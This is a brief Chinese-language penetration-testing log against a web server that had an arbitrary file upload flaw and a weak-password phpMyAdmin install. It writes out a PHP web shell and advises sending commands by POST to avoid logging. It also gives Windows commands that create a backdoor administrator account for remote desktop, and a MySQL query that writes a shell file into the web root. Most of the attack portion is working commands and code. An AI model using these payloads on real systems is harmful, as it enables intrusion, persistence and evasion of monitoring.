一、信息收集:
1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。
2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。
二、任意文件上传:
1、上传php文件:
<?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出来,直接访问可以解析 */
2、可以菜刀直接连了,或者我这里增加了一个账户
1 net user test test /add 2 net localgroup administrators test /add 3 /*加入管理员,可以3389*/
3、3389连上去:发现改机器被别人搞过:套路都一样。查日志post的,没操作。就能查到一个IP。根据网络安全监控设备日志查到归属人。
4、另外一个弱口令登进去,mysql写一句话
1 select "<?php system("cmd") ?>" into outfile "/mainpath/test.php";
5、菜刀连接。开启了安全模式,php很多函数执行不了。郁闷!